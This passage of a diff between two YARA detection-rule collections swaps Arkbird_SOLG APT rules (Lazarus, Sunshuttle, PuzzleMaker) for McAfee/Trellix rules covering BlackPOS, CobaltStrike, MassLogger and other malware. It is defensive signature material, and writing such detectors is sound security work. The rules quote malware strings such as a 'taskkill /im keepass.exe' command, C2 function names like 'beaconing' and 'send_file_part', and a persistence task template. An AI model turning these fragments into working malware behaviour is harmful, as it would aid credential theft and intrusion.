-		description = "Detect HTA with the fake picture header as decoy used by Lazarus"
-		author = "Arkbird_SOLG"
-		id = "1a57251e-f0fb-541c-bf8b-f1afecf7f1c7"
-		date = "2021-04-27"
-		modified = "2021-04-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-27/Lazarus/APT_Lazarus_HTA_Apr_2021_1.yara#L1-L21"
-		license_url = "N/A"
-		logic_hash = "40c2e5b662d1999c3ae5be97604bb9ebc809a383d66331cb4b385666ce55be2a"
+		description = "Rule to detect inabot worm based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "b899d2d6-000a-5363-9efe-527dcd0cea17"
+		date = "2013-04-19"
+		modified = "2020-08-14"
+		reference = "http://verwijderspyware.blogspot.com/2013/04/elimineren-w32inabot-worm-hoe-te.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_inabot_worm_pdb.yar#L1-L25"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "c9c010228254aae222e31c669dda639cdd30695729b8ef2b6ece06d899a496aa"
+		logic_hash = "70485de4e071b684faa87484ce2a53a8b2a29d0a2954e785b858c7ff1d908de0"
 		score = 75
-		quality = 63
-		tags = "FILE"
-		hash1 = "888cfc87b44024c48eed794cc9d6dea9f6ae0cc3468dee940495e839a12ee0db"
-		tlp = "white"
-		adversary = "Lazarus"
+		quality = 70
+		tags = "WORM, FILE"
+		rule_version = "v1"
+		malware_type = "worm"
+		malware_family = "Worm:W32/Inabot"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e }
-		$s2 = { 5b 27 4f 70 65 6e 54 65 78 74 46 69 6c 65 27 2c 27 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 27 }
-		$s3 = { 5b 27 70 75 73 68 27 5d }
-		$s4 = { 28 27 4d 5a 27 29 2c 65 5b 27 43 6c 6f 73 65 27 5d 28 29 }
-		$s5 = { 5b 27 73 68 69 66 74 27 5d 28 29 }
-		$s6 = { 3b 76 61 72 20 64 61 74 61 3d 5b }
-		$s7 = { 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 27 29 }
+		$pdb = "\\trasser\\portland.pdb"
+		$pdb1 = "\\mainstream\\archive.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x4d42 or uint16( 0 ) == 0xd8ff or uint32( 0 ) == 0x474e5089 or uint32( 0 ) == 0x38464947 ) and filesize > 20KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and any of them
 }
-rule ARKBIRD_SOLG_APT_UNC2452_Sunshuttle_Mar_2021_1 : FILE
+rule TRELLIX_ARC_MALWARE_Blackpos_Pdb : POS FILE
 {
 	meta:
-		description = "Detect Sunshuttle implant used by UNC2452 group"
-		author = "Arkbird_SOLG"
-		id = "faa07d19-4c61-554d-a6b1-ab7cb0919ec0"
-		date = "2021-03-06"
-		modified = "2021-03-06"
-		reference = "https://twitter.com/Arkbird_SOLG/status/1367570764468224010"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/UNC2452/APT_UNC2452_sunshuttle_Mar_2021_1.yar#L1-L31"
-		license_url = "N/A"
-		logic_hash = "368487f1716aaa5c10e19a428649d6706b3f45c53853e6729752dc41fc97bc38"
+		description = "BlackPOS PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "f37e1522-49c4-5369-bc2c-33b070e9eae7"
+		date = "2014-01-24"
+		modified = "2020-08-14"
+		reference = "https://en.wikipedia.org/wiki/BlackPOS_Malware"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_blackpos_pdb.yar#L1-L25"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "5a963e8aca62f3cf5872c6bff02d6dee0399728554c6ac3f5cb312b2ba7d7dbf"
+		logic_hash = "d8f3fa380ca15f0fae432849b8c16cb8a0a9d1427d3e72fbf89cbbd63b0849c9"
 		score = 75
-		quality = 63
-		tags = "FILE"
-		hash1 = "611458206837560511cb007ab5eeb57047025c2edc0643184561a6bf451e8c2c"
-		hash2 = "b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8"
-		hash3 = "bbd16685917b9b35c7480d5711193c1cd0e4e7ccb0f2bf1fd584c0aebca5ae4c"
+		quality = 70
+		tags = "POS, FILE"
+		rule_version = "v1"
+		malware_type = "pos"
+		malware_family = "Pos:W32/BlackPos"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 39 59 72 42 6a 6b 6b 58 46 79 6b 62 47 51 72 6d 56 32 4b 49 2f 41 48 44 69 7a 57 51 61 4d 38 47 38 4a 37 6b 56 4b 32 56 65 2f 46 55 74 5f 6b 6b 53 56 6c 78 32 36 49 6e 46 56 61 79 70 77 2f 6c 75 5a 41 54 35 55 6e 55 69 34 64 4a 65 6b 6e 73 6b 55 6e 22 }
-		$s2 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 71 6f 66 49 6b 76 62 6c 73 31 69 72 4f 36 78 68 6a 41 63 5a 2f 6a 49 69 71 41 70 70 31 56 6f 39 72 4f 53 2d 44 6a 65 4e 75 2f 62 50 75 6e 33 4e 35 74 49 42 58 4b 50 74 4e 79 73 48 4f 51 2f 41 52 53 72 63 65 6b 35 68 51 47 38 59 49 56 6e 4d 75 37 54 22 }
-		$s3 = { 6f 73 2f 65 78 65 63 2e 28 2a 43 6d 64 29 2e 52 75 6e }
-		$s4 = "main.request_session_key" fullword ascii
-		$s5 = "main.wget_file" fullword ascii
-		$s6 = "main.GetMD5Hash" fullword ascii
-		$s7 = "main.beaconing" fullword ascii
-		$s8 = "main.resolve_command" fullword ascii
-		$s9 = "main.send_file_part" fullword ascii
-		$s10 = "main.retrieve_session_key" fullword ascii
-		$s11 = "main.send_command_result" fullword ascii
-		$s12 = { 63 38 3a 32 37 3a 63 63 3a 63 32 3a 33 37 3a 35 61 }
-		$s13 = { 2d 2d 2d 2d 2d 42 45 47 49 4e }
-		$s14 = { 2d 2d 2d 2d 2d 45 4e 44 }
+		$pdb = "\\Projects\\Rescator\\MmonNew\\Debug\\mmon.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 800KB and 12 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and any of them
 }
-rule ARKBIRD_SOLG_APT_Unknown_Middle_East_Feb_2020_1 : FILE
+rule TRELLIX_ARC_Cyaxsharp_Rezer0 : LOADER
 {
 	meta:
-		description = "Dectect unknown Middle East implants (retrohunt June 2020)"
-		author = "Arkbird_SOLG"
-		id = "e45675e6-29d5-587b-943e-19450772a092"
-		date = "2021-03-05"
-		modified = "2021-03-06"
-		reference = "internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/Unknown/APT_Unknown_Middle_East_Feb_2020_1.yar#L1-L24"
-		license_url = "N/A"
-		logic_hash = "64cdac73bc3e29e8716cb24ae6577f853b2cf31303d129a0ec38ba89b7ff5351"
+		description = "Detects CyaX-Sharp/ReZer0 loader samples based on the embedded scheduled task template"
+		author = "Max 'Libra' Kersten for McAfee's Advanced Threat Research Team"
+		id = "7a1addcf-4e8f-5290-8788-9b0738128160"
+		date = "2021-04-08"
+		modified = "2021-08-04"
+		reference = "This rule was published in combination with the following McAfee ATR blog: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/see-ya-sharp-a-loaders-tale/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MAL_cyax_sharp_loader.yar#L1-L16"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "3d6daaf7a85a9b3898e4ce5d5293b09f26965f9f7280b34ba8f6814b7f14dec2"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "274beb57ae19cbc5c2027e08cb2b718dea7ed1acb21bd329d5aba33231fb699d"
-		hash2 = "3a4ef9b7bd7f61c75501262e8b9e31f9e9bc3a841d5de33dcdeb8aaa65e95f76"
+		quality = 70
+		tags = "LOADER"
+		version = "1.0"
+		malware_type = "loader"
 
 	strings:
-		$seq1 = { 55 8b ec 83 e4 f8 81 ec 08 04 00 00 a1 34 45 49 00 33 c4 89 84 24 04 04 00 00 83 ec 08 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 af 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 98 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 81 9f ff ff 83 c4 0c 8d 04 24 68 00 04 00 00 6a 00 50 e8 [2] 01 00 83 c4 0c 8d 04 24 [4] 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? ab 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 6c 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a9 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 33 c0 66 89 84 24 fe 03 00 00 8d 04 24 68 [2] 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a6 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 8d 4c 24 0c e8 6b a1 ff ff 83 c4 04 ba [2] 48 00 b9 ?? 83 48 00 68 [2] 48 00 e8 94 9e ff ff 8b 8c 24 10 04 00 00 83 c4 0c 33 cc e8 [2] 01 00 8b e5 5d }
-		$seq2 = { 55 8b ec 6a ff 68 [2] 47 00 64 a1 00 00 00 00 50 81 ec d8 00 00 00 a1 34 45 49 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 45 08 8b 75 14 c7 45 fc 00 00 00 00 89 85 34 ff ff ff 89 85 40 ff ff ff 33 c0 50 50 50 50 c7 85 3c ff ff ff 00 00 00 00 68 ?? 70 48 00 89 b5 6c ff ff ff c7 85 48 ff ff ff 00 00 00 00 c7 85 44 ff ff ff 00 00 00 00 89 85 50 ff ff ff ff 15 78 55 47 00 89 85 38 ff ff ff 85 c0 74 3f 6a 00 68 bb 01 00 00 68 ?? 6d 48 00 50 ff 15 8c 55 47 00 89 85 44 ff ff ff 85 c0 74 22 68 00 00 80 00 6a 00 6a 00 6a 00 68 ?? 71 48 00 68 ?? 6d 48 00 50 ff 15 90 55 47 00 89 85 50 ff ff ff 8b 3d 44 53 47 00 6a 00 6a 00 6a 00 6a 00 6a ff 56 6a 00 68 e9 fd 00 00 ff d7 8b f0 56 e8 ?? 35 01 00 83 c4 04 89 85 4c ff ff ff 6a 00 6a 00 56 50 6a ff ff b5 6c ff ff ff 6a 00 68 e9 fd 00 00 ff d7 68 80 00 00 00 8b f8 8d 85 70 ff ff ff 6a 00 50 e8 [2] 02 00 57 8d 85 70 ff ff ff 68 ?? 79 48 00 50 e8 ?? a3 00 00 83 c4 18 c7 85 64 ff ff ff 00 00 00 00 33 c0 c7 85 68 ff ff ff 07 00 00 00 8d 8d 54 ff ff ff 66 89 85 54 ff ff ff 6a 10 68 [2] 48 00 e8 ?? 84 00 00 8d 8d 70 ff ff ff c7 45 fc 01 00 00 00 8d 51 02 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca 8d 85 70 ff ff ff d1 f9 51 50 8d 8d 54 ff ff ff e8 89 63 00 00 6a 33 68 ?? 71 48 00 8d 8d 54 ff ff ff e8 77 63 00 00 8b b5 50 ff ff ff 85 f6 }
-		$s1 = "taskkill /im svehost.exe /t /f" fullword ascii
-		$s2 = "\\AppData\\Windows\\svehost.exe" fullword ascii
-		$s3 = "svehost.exe" fullword wide
-		$s4 = "bdagent.exe" fullword wide
-		$s5 = "taskkill /im keepass.exe /t /f" fullword ascii
-		$s6 = "%s\\AppData\\Windows\\svehost" fullword ascii
-		$s7 = "\\AppData\\Roaming\\ViberPc" fullword wide
-		$s8 = "\\AppData\\Roaming\\Skype" fullword wide
+		$template = { 01A10C3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C5461736B2076657273696F6E3D22312E322220786D6C6E733D22687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F77696E646F77732F323030342F30322F6D69742F7461736B223E0D0A20203C526567697374726174696F6E496E666F3E0D0A202020203C446174653E323031342D31302D32355431343A32373A34342E383932393032373C2F446174653E0D0A202020203C417574686F723E5B5553455249445D3C2F417574686F723E0D0A20203C2F526567697374726174696F6E496E666F3E0D0A20203C54726967676572733E0D0A202020203C4C6F676F6E547269676765723E0D0A2020202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A202020203C2F4C6F676F6E547269676765723E0D0A202020203C526567697374726174696F6E547269676765723E0D0A2020202020203C456E61626C65643E66616C73653C2F456E61626C65643E0D0A202020203C2F526567697374726174696F6E547269676765723E0D0A20203C2F54726967676572733E0D0A20203C5072696E636970616C733E0D0A202020203C5072696E636970616C2069643D22417574686F72223E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A2020202020203C4C6F676F6E547970653E496E746572616374697665546F6B656E3C2F4C6F676F6E547970653E0D0A2020202020203C52756E4C6576656C3E4C6561737450726976696C6567653C2F52756E4C6576656C3E0D0A202020203C2F5072696E636970616C3E0D0A20203C2F5072696E636970616C733E0D0A20203C53657474696E67733E0D0A202020203C4D756C7469706C65496E7374616E636573506F6C6963793E53746F704578697374696E673C2F4D756C7469706C65496E7374616E636573506F6C6963793E0D0A202020203C446973616C6C6F77537461727449664F6E4261747465726965733E66616C73653C2F446973616C6C6F77537461727449664F6E4261747465726965733E0D0A202020203C53746F704966476F696E674F6E4261747465726965733E747275653C2F53746F704966476F696E674F6E4261747465726965733E0D0A202020203C416C6C6F77486172645465726D696E6174653E66616C73653C2F416C6C6F77486172645465726D696E6174653E0D0A202020203C53746172745768656E417661696C61626C653E747275653C2F53746172745768656E417661696C61626C653E0D0A202020203C52756E4F6E6C7949664E6574776F726B417661696C61626C653E66616C73653C2F52756E4F6E6C7949664E6574776F726B417661696C61626C653E0D0A202020203C49646C6553657474696E67733E0D0A2020202020203C53746F704F6E49646C65456E643E747275653C2F53746F704F6E49646C65456E643E0D0A2020202020203C526573746172744F6E49646C653E66616C73653C2F526573746172744F6E49646C653E0D0A202020203C2F49646C6553657474696E67733E0D0A202020203C416C6C6F7753746172744F6E44656D616E643E747275653C2F416C6C6F7753746172744F6E44656D616E643E0D0A202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A202020203C48696464656E3E66616C73653C2F48696464656E3E0D0A202020203C52756E4F6E6C79496649646C653E66616C73653C2F52756E4F6E6C79496649646C653E0D0A202020203C57616B65546F52756E3E66616C73653C2F57616B65546F52756E3E0D0A202020203C457865637574696F6E54696D654C696D69743E505430533C2F457865637574696F6E54696D654C696D69743E0D0A202020203C5072696F726974793E373C2F5072696F726974793E0D0A20203C2F53657474696E67733E0D0A20203C416374696F6E7320436F6E746578743D22417574686F72223E0D0A202020203C457865633E0D0A2020202020203C436F6D6D616E643E5B4C4F434154494F4E5D3C2F436F6D6D616E643E0D0A202020203C2F457865633E0D0A20203C2F416374696F6E733E0D0A3C2F5461736B3E }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $seq* ) and 4 of ( $s* )
+		$template
 }
-rule ARKBIRD_SOLG_APT_Puzzlemaker_Implant_Jun_2021_1 : FILE
+rule TRELLIX_ARC_MALW_Cobaltrike : BACKDOOR FILE
 {
 	meta:
-		description = "Detect the implant of the PuzzleMaker group"
-		author = "Arkbird_SOLG"
-		id = "9387130c-4474-55bf-9736-09494a5e81b8"
-		date = "2021-06-10"
-		modified = "2021-11-01"
-		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Implant_Jun_2021_1.yara#L1-L21"
-		license_url = "N/A"
-		logic_hash = "e54eaaa76b2d370a27a232dee2299266f8b3b82d53da36e35c2a6fcdd7d5b1f7"
+		description = "Rule to detect CobaltStrike beacon"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "a7dae4c7-672e-58fb-8542-90fa90d991a4"
+		date = "2020-07-19"
+		modified = "2021-08-30"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_cobaltstrike.yar#L1-L38"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "fc91d40c6544c7ab7c60b3cb8fc542bd4a6fac79dbe00cad8f612854f2a6dcd1"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "8a17279ba26c8fbe6966ea3300fdefb1adae1b3ed68f76a7fc81413bd8c1a5f6"
-		hash2 = "1ee9bb4e8bcabe197399b654dbf940438b120af1c376719ff9bdccf2bb1dc606"
-		hash3 = "f2ce2a00de8673f52d37911f3e0752b8dfab751b2a17e719a565b4083455528e"
-		tlp = "White"
-		adversary = "PuzzleMaker"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/CobaltStrike"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
+		hash1 = "f47a627880bfa4a117fec8be74ab206690e5eb0e9050331292e032cd22883f5b"
 
 	strings:
-		$s1 = { 4c 8d 4c 24 5c 49 8b ce 48 8d 95 c0 00 00 00 ff 15 21 01 04 00 85 c0 74 28 4c 8d 4c 24 58 4c 89 64 24 20 41 b8 00 04 00 00 48 8d 95 c0 04 00 00 49 8b cf ff 15 b5 fe 03 00 85 c0 0f 85 25 ff ff ff ff 15 77 fe 03 00 8b }
-		$s2 = { 40 55 53 56 41 55 41 57 48 8d ac 24 a0 fe ff ff 48 81 ec 60 02 00 00 48 8b 05 5a 1c 03 00 48 33 c4 48 89 85 30 01 00 00 48 8b 85 b0 01 00 00 4c 8b f9 48 8b b1 b8 00 00 00 4c 8b ad c8 01 00 00 48 83 c6 07 48 89 44 24 60 48 8b 85 d0 01 00 00 48 89 45 98 8b 85 c0 01 00 00 83 c0 fd 48 c1 ee 03 4c 89 4d 80 4c 89 45 88 48 89 55 90 83 f8 06 0f 87 84 03 00 00 48 8d 15 f3 6b fd ff 48 98 8b 8c 82 b0 97 02 00 48 }
-		$s3 = { 48 8d 1d 98 3d 02 00 0f 57 c0 48 89 bc 24 58 02 00 00 33 c0 c7 44 24 68 01 00 00 00 0f 11 85 80 00 00 00 4c 8b c6 c7 85 8c 00 00 00 10 27 00 00 48 8d 95 a0 00 00 00 48 89 44 24 70 49 8b c9 48 89 44 24 78 0f 11 45 20 0f 11 45 30 0f 11 45 40 0f 11 45 50 0f 11 45 60 0f 11 45 70 0f 11 85 90 00 00 00 e8 57 58 fe ff 8b f8 85 c0 0f 85 62 02 00 00 49 8b 87 b8 00 00 00 48 8d 4c 24 68 48 8b 54 24 60 48 83 c0 07 48 c1 e8 03 4c 89 a4 24 50 02 00 00 4c 8b a5 b8 01 00 00 4c 3b e0 4c 89 b4 24 48 02 00 00 4d 8b f4 4c 0f 47 f0 4d 8b c6 e8 1b 57 fe ff 8b f8 85 c0 75 54 49 8b 87 b8 00 00 00 4a 8d 14 f5 00 00 00 00 48 }
-		$s4 = { 85 ff 0f 85 cd 01 00 00 48 8b 4d 90 48 8d 45 a0 48 89 44 24 50 45 33 c9 48 8d 45 d0 4d 8b c7 48 89 44 24 48 33 d2 4c 89 64 24 40 4c 89 64 24 38 c7 44 24 30 00 00 00 08 c7 44 24 28 01 00 00 00 4c 89 64 24 20 ff 15 62 1c 04 00 85 c0 75 3a ff 15 38 1d 04 00 44 8b c3 48 8b ce 8b d0 8b f8 e8 d1 09 00 00 48 8b 4d 80 ff 15 07 1d 04 00 48 8b 4d 88 ff 15 fd 1c 04 00 48 8b 4d 90 ff 15 f3 1c 04 00 }
-		$s5 = { 40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 ec 28 02 00 00 48 8b 05 5d 0a 04 00 48 33 c4 48 89 84 24 10 02 00 00 48 8b ac 24 90 02 00 00 0f 57 c0 4c 8b ac 24 98 02 00 00 33 db 45 32 e4 4c 89 4c 24 58 4c 89 44 24 70 49 8b f9 48 89 6c 24 68 4d 8b c8 4c 89 6c 24 60 4c 8b fa 48 8b f1 44 8b f3 0f 11 84 24 e0 00 00 00 c7 84 24 ec 00 00 00 10 27 00 00 0f 11 84 24 80 00 00 00 0f 11 84 24 90 00 00 00 0f 11 84 24 a0 00 00 00 0f 11 84 24 b0 00 00 00 0f 11 84 24 c0 00 00 00 0f 11 84 24 d0 00 00 00 0f 11 84 24 f0 00 00 00 48 85 ed 75 47 4c 8b 81 b8 00 00 00 48 8d 05 a1 c2 ff ff 48 89 44 24 68 48 8d 8c 24 80 00 00 00 49 83 c0 07 48 8d 84 24 80 00 00 00 49 c1 e8 03 49 8b d1 48 89 44 24 60 e8 87 c2 ff ff 8b f8 85 c0 0f 85 ee 01 00 00 48 8b 7c 24 58 48 8d 56 68 48 8d 4f 18 e8 7b 4a ff ff 85 c0 75 15 48 8d 56 50 48 8b cf e8 6b 4a ff ff 85 c0 75 05 40 b5 }
-		$s6 = { 41 b9 01 00 00 00 c7 44 24 20 00 00 00 f0 45 33 c0 48 8d 4c 24 60 33 d2 ff 15 11 06 04 00 85 c0 74 28 48 8b 4c 24 60 4c 8d 85 b0 00 00 00 ba 20 00 00 00 ff 15 ee 05 04 00 48 8b 4c 24 60 33 d2 85 }
+		$pattern_0 = { e9???????? eb0a b801000000 e9???????? }
+		$pattern_1 = { 3bc7 750d ff15???????? 3d33270000 }
+		$pattern_2 = { 8bd0 e8???????? 85c0 7e0e }
+		$pattern_3 = { 50 8d8d24efffff 51 e8???????? }
+		$pattern_4 = { 03b5d4eeffff 89b5c8eeffff 3bf7 72bd 3bf7 }
+		$pattern_5 = { 8b450c 8945f4 8d45f4 50 }
+		$pattern_6 = { 33c5 8945fc 8b4508 53 56 ff750c 33db }
+		$pattern_7 = { e8???????? e9???????? 833d????????01 7505 e8???????? }
+		$pattern_8 = { 53 53 8d85f4faffff 50 }
+		$pattern_9 = { 68???????? 53 50 e8???????? 83c424 }
+		$pattern_10 = { 488b4c2420 8b0401 8b4c2408 33c8 8bc1 89442408 }
+		$pattern_11 = { 488d4d97 e8???????? 4c8d9c24d0000000 418bc7 498b5b20 498b7328 498b7b30 }
+		$pattern_12 = { bd08000000 85d2 7459 ffcf 4d85ed }
+		$pattern_13 = { 4183c9ff 33d2 ff15???????? 4c63c0 4983f8ff }
+		$pattern_14 = { 49c1e002 e8???????? 03f3 4d8d349e 3bf5 7d13 }
+		$pattern_15 = { 752c 4c8d45af 488d55af 488d4d27 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
+		7 of them and filesize < 696320
 }
-rule ARKBIRD_SOLG_APT_Puzzlemaker_Launcher_Jun_2021_1 : FILE
+rule TRELLIX_ARC_Masslogger_Stealer : STEALER FILE
 {
 	meta:
-		description = "Detect the launcher of the PuzzleMaker group"
-		author = "Arkbird_SOLG"
-		id = "ae31d9de-8e6c-5c1b-bc45-bc4e50cea00f"
-		date = "2021-06-10"
-		modified = "2021-11-01"
-		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Launcher_Jun_2021_1.yara#L1-L19"
-		license_url = "N/A"
-		logic_hash = "5c717ca5c57a86e1b5db45b3d581a45be248d45820c00c40c57a001ac07ce1b2"
+		description = "Rule to detect unpacked MassLogger stealer"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "c3a40108-3f0c-5949-9201-95c3c38b352a"
+		date = "2020-07-02"
+		modified = "2020-08-14"
+		reference = "https://urlhaus.abuse.ch/browse/signature/MassLogger/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_masslogger_stealer.yar#L1-L63"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "343873155b6950386f7d9bcd8d2b2e81088521aedf8ff1333d20229426d8145c"
+		logic_hash = "476b3f3a54a4616058a2aef01adbe429a38eacc8ee58881d31bd28e795a27575"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "982f7c4700c75b81833d5d59ad29147c392b20c760fe36b200b541a0f841c8a9"
-		tlp = "White"
-		adversary = "PuzzleMaker"
+		quality = 66
+		tags = "STEALER, FILE"
+		rule_version = "v1"
+		malware_type = "stealer"
+		malware_family = "Stealer:W32/MassLogger"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 4c 89 6d bf 48 8d 45 bf 48 89 44 24 20 4c 8d 0d f9 45 01 00 33 d2 44 8d 42 01 48 8d 0d dc 45 01 00 ff 15 56 44 01 00 8b d8 85 c0 78 c6 4c 89 6d c7 48 8b 45 bf 48 8b 08 4c 8b 79 18 b9 18 00 00 00 e8 9b 04 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 32 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8d 0d 15 fb 01 00 ff 15 cf 43 01 00 48 89 03 48 85 }
-		$s2 = { 44 89 6c 24 38 4c 89 6c 24 30 c7 44 24 28 03 00 00 00 c7 44 24 20 03 00 00 00 45 33 c9 45 33 c0 41 8d 51 0a 48 8b 4d c7 ff 15 f6 42 01 00 85 c0 0f 88 bb 01 00 00 48 8d 0d 1d fa 01 00 ff 15 c1 42 01 00 4c 8b f8 48 8d 0d 1b fa 01 00 ff 15 b1 42 01 00 4c 8b e0 4c 89 6d df 48 8b 4d c7 48 8b 11 4c 8b 52 30 4c 89 6c 24 28 48 8d 45 df 48 89 44 24 20 45 33 c9 45 33 c0 49 8b d4 41 ff d2 4c 89 6d e7 48 8b 4d df 48 8b 01 4c 89 6c 24 20 4c 8d 4d e7 45 33 c0 49 8b d7 ff 90 98 00 00 00 4c 89 6d cf 48 8b 4d e7 48 8b 01 4c 8d 45 cf 33 d2 ff 50 78 b8 08 00 00 00 66 89 45 ef 8d 48 10 e8 dc 02 00 00 48 8b d8 48 89 45 a7 48 85 c0 74 33 0f 57 c0 33 c0 0f 11 03 48 89 43 10 4c 89 6b 08 c7 43 10 01 00 00 00 48 8b ce ff 15 14 42 01 00 48 89 03 48 85 c0 75 0e 48 85 }
-		$s3 = { 4c 8d 05 75 0e 02 00 0f 1f 40 00 66 0f 1f 84 00 00 00 00 00 0f b6 d0 42 0f b6 0c 12 66 41 31 08 74 12 ff c0 49 83 c0 02 83 f8 20 72 e7 0f 1f 80 00 00 00 00 0f b7 05 49 09 02 00 48 8d 0d 76 09 02 00 66 d1 e8 66 83 e0 7f 66 0f 6f 15 f3 d4 01 00 66 89 05 2c 09 02 00 0f b7 05 27 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 19 09 02 00 0f b7 05 14 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 06 09 02 00 0f b7 05 01 09 02 00 66 d1 e8 66 83 e0 7f 66 89 05 f3 08 02 00 0f b7 05 ee 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 e0 08 02 00 0f b7 05 db 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 cd 08 02 00 0f b7 05 c8 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 ba 08 02 00 0f b7 05 b5 08 02 00 66 d1 e8 66 83 e0 7f f3 0f 6f 05 bc 08 02 00 66 89 05 9f 08 02 00 0f b7 05 9a 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 8c 08 02 00 0f b7 05 87 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 79 08 02 00 0f b7 05 74 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 66 08 02 00 0f b7 05 61 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 53 08 02 00 0f b7 05 4e 08 02 00 66 d1 e8 66 83 e0 7f 66 89 05 40 08 02 00 0f b7 05 3b 08 02 